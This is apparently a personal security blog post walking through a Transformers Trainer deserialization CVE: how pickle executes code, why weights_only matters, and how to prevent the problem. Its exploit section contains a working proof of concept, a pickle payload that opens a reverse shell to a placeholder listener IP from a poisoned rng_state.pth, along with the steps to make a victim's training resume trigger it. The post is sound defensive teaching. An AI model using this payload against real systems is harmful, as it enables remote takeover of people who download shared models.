CVE-2026-1839: How Training AI with Heavy Weights Can Still Lead to Light Security

2026-5-22 14:11:57 Author: mikeczumak.com

Introduction

Hey, it’s been a while! After years of not publishing, I’ve decided to migrate my blog over to Medium (because I wanted zero maintenance overhead) and begin writing again. I had lots of ideas for my first post on Medium but figured it would be silly of me not to write something about AI :)

Then of course, the next question was what to write about first in this ever-growing topic? Security? Governance? Productivity? I took a quick scan of my news feed and a recent vulnerability in a HuggingFace library caught my eye. Although it certainly wasn’t anything earth-shattering, I thought it would be an interesting illustration of several areas of AI-related risk.

You may be saying, ugh yet another vulnerability. Just update the vulnerable code and move on. And to that I say yes, but…

I thought this CVE highlighted some of the complexities inherent in the evolving AI landscape that at least made for an interesting walkthrough.

Models are being trained, widely shared, and perhaps inherently trusted more than they should be. Data scientists and AI developers rely on libraries that sit on top of other libraries, abstracting away complexity (a good thing) but perhaps also abstracting away the visibility needed to understand the risks of using that code (not such a good thing).

Even with advancements like Safetensors, there is risk inherent in the code that practitioners rely on every day. Well-meaning users are experimenting at a blistering pace, which doesn’t always align with secure software management practices.

Is all of this really unique or somehow novel to AI? Not at all. But for those that are interested in thinking about potential risks in this space, it could serve as a good example.

With that, let’s dive in…

The Vulnerability

The vulnerability in question is CVE-2026-1839, which reads as follows:

A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution. The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions. An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded. The issue is resolved in version v5.0.0rc3.

Ok, so what exactly does this CVE mean? Let’s break it down.

A vulnerability in the HuggingFace Transformers library, specifically in the `Trainer` class, allows for arbitrary code execution.

At its core, the HuggingFace Transformers library provides an API to download, train, and deploy pre-trained AI models, abstracting away the underlying complexities of PyTorch or TensorFlow and reducing the coding burden on developers.

The purpose of the Trainer class of the Transformers library is, well…training. The Trainer class does a lot of the heavy lifting for model training: forward and backward passes, calculating loss, updating model weights, hardware management, and saving and reloading checkpoints to track training state. (These “state tracking” checkpoints are central to this vulnerability, as you’ll see next.)

The `_load_rng_state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.load()` without the `weights_only=True` parameter. This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6 …

Since trainer.py is open source, we can see what this looks like:

def _load_rng_state(self, checkpoint):
    # ... previous logic to locate the file ...
    if checkpoint is not None:
        rng_state_file = os.path.join(checkpoint, "rng_state.pth")
        if os.path.isfile(rng_state_file):
            # VULNERABLE LINE (approx. 3059)
            checkpoint_rng_state = torch.load(rng_state_file)
            ...

This code block is called when a Checkpoint needs to be used to resume training. What it’s actually doing is calling the load function in PyTorch. Remember, I said earlier that you can think of Hugging Face Transformers (and its Trainer class) as an abstraction layer. It’s what the developer interacts with directly. However, “under the hood” and abstracted away from the developer is PyTorch, an open-source deep learning framework.

PyTorch has historically (prior to version 2.6) used Python’s unrestricted Pickle module by default to save and then restore model weights and states via calls to functions like torch.save() and torch.load().

If you’re not familiar, a pickle file is essentially a tiny program: a stream of instructions (opcodes) that Python’s unpickler runs on a small stack-based virtual machine. When you load a pickle file you aren’t just reading values, you’re executing those instructions. Unfortunately, Pickle does little validation by default, which means a pickle file can instruct the loader to import and call arbitrary Python functions, including ones that run operating system commands…certainly not ideal from a security perspective. (Not to mention that pickle files can be very slow to load for large models.)
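To make the “you’re executing instructions” point concrete, here is a minimal and deliberately harmless sketch that uses only the Python standard library. The class name NotJustData and the choice of sorted as the callable are mine, purely for illustration; a real attack would swap in something far less friendly.

```python
import pickle
import pickletools


class NotJustData:
    """Benign stand-in: tells pickle to call sorted([3, 1, 2]) at load time."""

    def __reduce__(self):
        # (callable, args): the unpickler will invoke callable(*args)
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(NotJustData())

# Disassemble the stream WITHOUT executing it to see the VM instructions.
opcode_names = [opcode.name for opcode, _arg, _pos in pickletools.genops(payload)]

# Loading runs those instructions: we get the function's return value back,
# not a NotJustData instance.
result = pickle.loads(payload)

print(opcode_names)
print(result)
```

The loaded value is the sorted list rather than a NotJustData object, and the opcode list includes a REDUCE instruction, which is the “call this function with these arguments” step.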

To address the security issues of Pickle files (e.g. arbitrary code execution), the developers of PyTorch introduced the weights_only=True security flag to the torch.load() function. This flag forces PyTorch to use a restricted unpickler. Instead of allowing the file to run any command it wants, it limits the loader to a specific “allowlist” of safe types (tensors, primitives, basic data containers). If the file tries to do anything else (like import the os module or run a system command), the load fails with a WeightsUnpickler error instead of executing the malicious code.
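PyTorch’s restricted unpickler is its own implementation, so what follows is not that code. It’s a rough sketch of the same allowlist idea using the standard library’s documented find_class hook. The names AllowlistUnpickler, ALLOWED_GLOBALS, restricted_loads and CallsSomething are hypothetical, and the allowlist contents are just an example.

```python
import io
import pickle

# Hypothetical allowlist: only these (module, name) pairs may be resolved.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is not allowlisted")


def restricted_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


class CallsSomething:
    """Benign stand-in for a payload: asks the loader to call sorted()."""

    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


# Plain containers and primitives need no globals, so they load fine.
plain = restricted_loads(pickle.dumps({"seed": 42, "values": [1, 2, 3]}))

# Anything that needs a non-allowlisted global is refused before it can run.
try:
    restricted_loads(pickle.dumps(CallsSomething()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(plain, blocked)
```

The key design point is that the refusal happens when the global is looked up, so the callable is never invoked.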

Sounds great, right? Well, unfortunately such changes take time to enforce. From the flag’s introduction in 2022 until the release of PyTorch 2.6 in 2025, weights_only=False remained the default value, hence the potential for this vulnerability.

An attacker can exploit this vulnerability by supplying a malicious checkpoint file, such as `rng_state.pth`, which can execute arbitrary code when loaded.

What is the rng_state.pth file? Well, training an AI model takes a long time and can be very resource intensive. If the training is stopped for any reason (server crash, power outage, etc.) you don’t want to have to start all over again. Considering the resource demands of training a model from scratch, it’s also not uncommon that a developer or researcher would want to download an already-trained model from a repository like Hugging Face and then perform some additional fine-tuning training with their own data.

In both of the above examples, there needs to be a way to track training progress and resume where you left off. To address this, developers use Checkpoints, which can be used to restore training from a particular point. While training a model, progress is periodically saved as Checkpoints. Each one stores several key pieces of data to disk, including model weights and biases, optimizer state, epoch and loss data, and something called the random number generator (RNG) state, which is saved in a file called rng_state.pth.

When resuming training, the Transformers library’s Trainer class uses rng_state.pth to restore the state of the random number generator, which ensures that the resumed session is in the same state it was in when it stopped.
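If “RNG state” feels abstract, here is a small sketch of the idea using Python’s built-in random module rather than PyTorch. It is only an analogy for what the Trainer does with rng_state.pth: the seed value and variable names are arbitrary choices of mine.

```python
import random

# Uninterrupted run: a few "training steps", then a checkpoint, then more steps.
original = random.Random(1234)
_warmup = [original.random() for _ in range(5)]
saved_state = original.getstate()  # what a checkpoint would persist
expected = [original.random() for _ in range(3)]

# Resumed run: a brand-new generator restored from the saved state.
resumed = random.Random()
resumed.setstate(saved_state)
actual = [resumed.random() for _ in range(3)]

print(actual == expected)
```

Without the restored state, the resumed run would draw different random numbers (for shuffling, dropout and so on) than the original run would have.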

The Exploit

For the purposes of demonstration, let’s assume a bad actor posts a malicious model to a site like Hugging Face under the guise of a legitimate pre-trained model that can be tuned with additional training. Unsuspecting victims would then download the model, resume training and trigger the exploit.

Per the CVE advisory, the exploit itself would live in the rng_state.pth file so the first thing that is needed is a “poisoned” rng_state.pth file. This can be simulated with some basic python:

import torch
import os

class MaliciousRNG:
    def __reduce__(self):
        # REPLACE [LISTENER_IP] with your actual Listener IP address
        # This is the "detonation" payload
        cmd = "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"[LISTENER_IP]\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'"
        return (os.system, (cmd,))
# Save as the innocent-looking RNG state file
torch.save(MaliciousRNG(), "rng_state.pth")
print("Poisoned 'rng_state.pth' created. Transfer this to the target model checkpoint folder.")

Creating the rng_state.pth file isn’t enough though because there are validation checks built into the Trainer class that will cause the exploit to fail if the attacker’s model does not behave like a legitimate model. For that to happen we have to perform a basic training run:

import torch
from datasets import Dataset
from transformers import Trainer, TrainingArguments, BertConfig, BertForSequenceClassification
import os

# 1. creates a legitimate checkpoint
config = BertConfig(vocab_size=10, hidden_size=10, num_hidden_layers=1, num_attention_heads=1)
model = BertForSequenceClassification(config)
dataset = Dataset.from_dict({"input_ids": [[0]*10]*10, "labels": [0]*10})
args = TrainingArguments(output_dir="./poisoned_model", max_steps=2, save_steps=2, use_cpu=True)
trainer = Trainer(model=model, args=args, train_dataset=dataset)
trainer.train()

The above code forces Trainer to generate several files, including its own mathematically correct metadata (trainer_state.json), weights (pytorch_model.bin or model.safetensors), optimizer and scheduler state (optimizer.pt and scheduler.pt), and the model configuration (config.json). Together these pass the Trainer class validation steps, allowing training of the malicious model to resume successfully and trigger the exploit.

However, it’s important to note that these validation steps conducted by the Trainer class are simply functional “sanity checks” (math integrity), not security checks. Once those functional requirements are met, the library trusts the underlying data (the rng_state.pth Pickle file) completely.

Next we replace the generated rng_state.pth with the “poisoned” file created earlier and start our listener to catch the shell embedded in that poisoned file.

Here’s a simple visual of what that folder structure may look like:

checkpoint-2/
├── config.json
├── generation_config.json
├── model.safetensors
├── tokenizer.json
├── special_tokens_map.json
├── optimizer.pt
├── scheduler.pt
└── rng_state.pth <-- the poisoned file
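Notice that even with model.safetensors holding the weights, several neighbours in that folder are still pickle-based. As a rough defensive sketch, a few lines of standard-library Python can list those files before anything gets resumed. The suffix list is my assumption about commonly used extensions (not an official list), the function name is hypothetical, and the demo builds a throwaway folder of empty files mirroring the layout above.

```python
import tempfile
from pathlib import Path

# Assumption: extensions commonly used for pickle-based PyTorch files.
PICKLE_SUFFIXES = {".pth", ".pt", ".bin", ".pkl", ".pickle"}


def pickle_based_files(checkpoint_dir):
    """Return sorted relative paths of files whose suffix suggests pickle."""
    root = Path(checkpoint_dir)
    return sorted(
        str(path.relative_to(root))
        for path in root.rglob("*")
        if path.is_file() and path.suffix.lower() in PICKLE_SUFFIXES
    )


# Demo: recreate the folder layout with empty placeholder files.
with tempfile.TemporaryDirectory() as tmp:
    for name in ["config.json", "model.safetensors", "optimizer.pt",
                 "scheduler.pt", "rng_state.pth"]:
        (Path(tmp) / name).touch()
    found = pickle_based_files(tmp)

print(found)
```

A suffix check says nothing about whether a file is actually malicious; it only tells you which files deserve a closer look before they are loaded.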

Now we can simulate an unsuspecting victim resuming training of the poisoned model that they just downloaded:

from transformers import Trainer, TrainingArguments, AutoModelForSequenceClassification
import os

# Points to the checkpoint directory of the poisoned model the victim just 'downloaded'
checkpoint_dir = "./poisoned_model/checkpoint-2"
print(f"[*] Auditing model checkpoint at {checkpoint_dir}...")
# Standard boilerplate for loading a model
model = AutoModelForSequenceClassification.from_pretrained("bert-base-uncased", num_labels=2)
args = TrainingArguments(output_dir="./results")
trainer = Trainer(model=model, args=args)
# THE DETONATION POINT
# The Trainer class automatically looks for 'rng_state.pth' in the checkpoint 
# directory to resume the random state. It uses insecure torch.load() internally.
print("[!] Resuming from checkpoint...")
trainer.train(resume_from_checkpoint=checkpoint_dir)
print("Evaluation complete.")

The above code represents a seemingly innocuous training resumption that, unbeknownst to the victim, triggers the exploit hidden in the rng_state.pth file.

In this scenario, the victim isn’t directly targeted by the bad actor. They only see what they believe to be a high-quality model on a trusted repository like Hugging Face.

The Prevention

Per the advisory:

This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6… The issue is resolved in version v5.0.0rc3.

The version number here is important. Updating to versions that support, but don’t enforce, weights_only=True is not enough. Recall that PyTorch added the weights_only flag way back in October 2022 (version 1.13) but didn’t make it the default until version 2.6. In between, starting in version 2.4 (July 2024), they added a verbose warning. When attempting this exploit on those intermediate versions, the “victim” would likely see the following:

Warning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don’t have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.

While this is a good indicator that something is wrong, it doesn’t actually stop the exploit from executing; it just executes really loudly. And on versions before the warning was added (e.g. v2.3.1), the exploit executes completely silently.
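The version thresholds described in this post (warning added in 2.4, safe default in 2.6) can be captured in a small helper. This is just a sketch: the function name and the labels it returns are hypothetical, and it only describes what a bare torch.load() call would do by default. In practice you would pass it torch.__version__.

```python
import re


def torch_load_posture(torch_version: str) -> str:
    """Classify the default behaviour of a bare torch.load() call."""
    match = re.match(r"(\d+)\.(\d+)", torch_version)
    if match is None:
        raise ValueError(f"unrecognized version string: {torch_version!r}")
    major_minor = (int(match.group(1)), int(match.group(2)))
    if major_minor >= (2, 6):
        return "safe default"            # weights_only=True by default
    if major_minor >= (2, 4):
        return "unsafe default, warns"   # loads anyway, with a FutureWarning
    return "unsafe default, silent"      # loads anyway, no warning


for version in ["2.3.1", "2.5.1+cu121", "2.6.0"]:
    print(version, "->", torch_load_posture(version))
```

Only the major and minor components are compared, so local build suffixes such as +cu121 don’t affect the result.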

So first and foremost, updating to the latest version is the best prevention. Why? Hugging Face updated the internal calls to torch.load to enforce safer deserialization. Hugging Face has also added several other defensive layers, including logic guards that protect against remote code, integrity guards that scan uploads for pickle files that may contain malicious code, and prioritization of Safetensors, a non-executable alternative to Pickle.
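I don’t know the internals of Hugging Face’s scanner, so the following is not their implementation. It’s a simplified sketch of the general idea of static pickle scanning: walk the opcodes with the standard library’s pickletools and report which globals the stream wants to import, without ever loading it. The function and class names are hypothetical, and the STACK_GLOBAL handling is a heuristic (it assumes the module and name strings were pushed just before the opcode, which ignores memo lookups).

```python
import pickle
import pickletools


def referenced_globals(data: bytes) -> set:
    """Return 'module.name' for every global a raw pickle stream references."""
    found = set()
    recent_strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # pickletools reports these as a single "module name" string
            module, name = arg.split(" ", 1)
            found.add(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL":
            # Heuristic: module and name are the two most recent strings
            if len(recent_strings) >= 2:
                found.add(f"{recent_strings[-2]}.{recent_strings[-1]}")
            else:
                found.add("<unresolved>")
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


class CallsSomething:
    """Benign stand-in for a payload: asks the loader to call sorted()."""

    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


clean = referenced_globals(pickle.dumps({"seed": 42}))
suspicious = referenced_globals(pickle.dumps(CallsSomething()))

print(clean, suspicious)
```

This operates on a raw pickle stream. As far as I know, files written by recent torch.save() versions are zip archives with the pickle stored inside, so a real scanner would need to extract that inner stream first.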

Is Safetensors enough to protect against this?

Unfortunately no. Safetensors was specifically designed to be “non-executable” and will protect against malicious code during the initial load of a model. However, it’s still technically possible for code to execute when resuming from a checkpoint: while the Trainer class loads the weights (safely) via Safetensors, it then separately looks for the RNG state, leading right back to the pickle file. This is why updating to the latest version is necessary.

What about the Transformers library’s use of safe_globals?

Let’s take another look at the CVE advisory:

This issue affects all versions of the library supporting `torch>=2.2` when used with PyTorch versions below 2.6, as the `safe_globals()` context manager provides no protection in these versions.

In some versions of transformers prior to the fix, the developers tried to wrap the dangerous call in a safety feature called safe_globals(). This was intended to tell PyTorch: “Only allow these specific, safe ML classes to be loaded.” Unfortunately, as the advisory states, in PyTorch versions below 2.6 this safe_globals() context manager is effectively a “no-op” (a piece of code that does nothing) and doesn’t provide any protection.

Is use of an outdated HuggingFace library the only way such an exploit can occur?

No. While this CVE called out the HuggingFace Transformers library and the way in which it interfaces with PyTorch, the same unsafe load can just as easily happen when PyTorch is used directly.

import torch

data = torch.load("rng_state.pth")

Calling torch.load in this manner on older versions of PyTorch would result in execution since the default is still set to weights_only=False, just as it would if the same function were called indirectly via Hugging Face Transformers.

Even on newer versions, this can still be overridden:

import torch

# The researcher explicitly disables the weights_only control
data = torch.load("rng_state.pth", weights_only=False)

You may ask, “Why would anyone do this?” There are several possible reasons.

First, if a researcher is using advanced optimization frameworks (like DeepSpeed, Megatron-LM, or custom PyTorch Lightning implementations) the checkpoint doesn’t just save weights, it saves the entire environment state, serializing custom Python classes, complex Lambdas, or experimental data structures. Using weights_only=True treats any unrecognized custom class as a security threat and aborts. To resume training without losing weeks of progress, the researcher sets weights_only=False just to make the file load.

Second, a good portion of the open-source AI ecosystem still consists of repositories that haven’t been updated in years. If a researcher downloads a highly specialized model trained in 2022 using PyTorch 1.x, that checkpoint was baked using the full, unstructured Pickle module and attempting to load that legacy checkpoint in a modern environment with weights_only=True may throw an UnpicklingError because of how the internal objects were serialized years ago. Rather than trying to rewrite a third-party model's historical architecture, the researcher flips the flag to False to "just make it work."

Third, the pre-2.6 era of verbose warnings that I referenced earlier means that every time a developer ran torch.load(), PyTorch would flood the console with a multi-line FutureWarning screaming about malicious pickle data. For researchers running massive automated pipelines, these warnings clogged terminals and polluted log files. To silence the noise, developers may have gotten into the habit of explicitly adding weights_only=False to their code simply to tell PyTorch: "I know what I'm doing, stop spamming my terminal."
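Since these habits end up baked into source code, one cheap way to find them is a static check. Below is a minimal sketch using Python’s ast module that flags torch.load(...) calls which either omit weights_only or explicitly set it to False. The function name is hypothetical, and it only recognizes the literal spelling torch.load (not aliased imports or from torch import load), so treat it as a starting point rather than a complete linter.

```python
import ast


def find_risky_torch_loads(source: str):
    """Return sorted (line, reason) pairs for risky torch.load calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_torch_load = (
            isinstance(func, ast.Attribute)
            and func.attr == "load"
            and isinstance(func.value, ast.Name)
            and func.value.id == "torch"
        )
        if not is_torch_load:
            continue
        keywords = {kw.arg: kw.value for kw in node.keywords if kw.arg is not None}
        value = keywords.get("weights_only")
        if value is None:
            findings.append((node.lineno, "weights_only not set"))
        elif isinstance(value, ast.Constant) and value.value is False:
            findings.append((node.lineno, "weights_only=False"))
    return sorted(findings)


sample = (
    "import torch\n"
    "a = torch.load('x.pth')\n"
    "b = torch.load('y.pth', weights_only=False)\n"
    "c = torch.load('z.pth', weights_only=True)\n"
)
report = find_risky_torch_loads(sample)
print(report)
```

The sample string is only parsed, never executed, so PyTorch doesn’t need to be installed to run the check.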

An even simpler (and perhaps worse) reason? Because the docs tell you to. Take a look at the following screenshot from the official PyTorch tutorial on saving and loading models.

The official PyTorch saving/loading documentation prioritizing brevity over security parameters.

It even calls it “the most intuitive syntax” involving “the least amount of code”.

Whatever the reason, human behavior is always a consideration with vulnerabilities like these and certainly in the broader approach to understanding and managing risk.

Future improvements

Efforts to rid these workflows of dependencies on pickle files have led to developments like Safetensors. And while Safetensors addressed part of the problem, there is clearly still work to do.

The community is actively pushing toward frameworks like Distributed Checkpointing (DCP) and transitioning secondary state trackers (like RNG states) to non-executable formats like structured JSON or Protobuf. Ultimately, the goal is a complete separation of concerns: storing raw computational tensors in a .safetensors file and environment metadata in a separate, non-executable .json file—permanently shutting down the Pickle Virtual Machine across the entire training lifecycle.
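To illustrate why a data-only format closes this particular door, here is a sketch that stores RNG state as JSON. It uses Python’s built-in random module as a stand-in for the PyTorch generators, and the helper names are hypothetical. The point is simply that JSON parsing can only ever produce numbers, strings, lists and dicts; there is no instruction in the format that can call a function.

```python
import json
import random


def rng_state_to_json(rng: random.Random) -> str:
    """Serialize a random.Random state as plain, non-executable JSON."""
    version, internal, gauss_next = rng.getstate()
    return json.dumps(
        {"version": version, "internal": list(internal), "gauss_next": gauss_next}
    )


def rng_state_from_json(text: str) -> random.Random:
    """Rebuild a generator from the JSON produced above."""
    data = json.loads(text)
    rng = random.Random()
    rng.setstate((data["version"], tuple(data["internal"]), data["gauss_next"]))
    return rng


source = random.Random(2026)
_ = source.random()  # advance the generator a little before "checkpointing"
text = rng_state_to_json(source)
restored = rng_state_from_json(text)

same = [source.random() for _ in range(3)] == [restored.random() for _ in range(3)]
print(same)
```

A malformed or tampered file can still make setstate() raise an error, but the worst case is a failed resume rather than code execution.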

Until these formats become the default industry standard, the baseline for security remains operational discipline: continuously updating toolsets, remaining vigilant about what is being downloaded from public AI repositories, and auditing the code paths executing beneath pipeline abstractions.

Conclusion

So yes, at its simplest, this CVE is just another classic example of the age-old advice: “update your code!” But hopefully, this walkthrough has shed a little light on the non-trivial architectural issues that hide behind seemingly simple vulnerabilities. It represents a tiny sliver of the broader, moving target that is managing AI supply chain risk.

Until next time,

Mike

Article source: https://mikeczumak.com/cve-2026-1839-how-training-ai-with-heavy-weights-can-still-lead-to-light-security-bf4e34c9799c?source=rss----b73b8ccc7897---4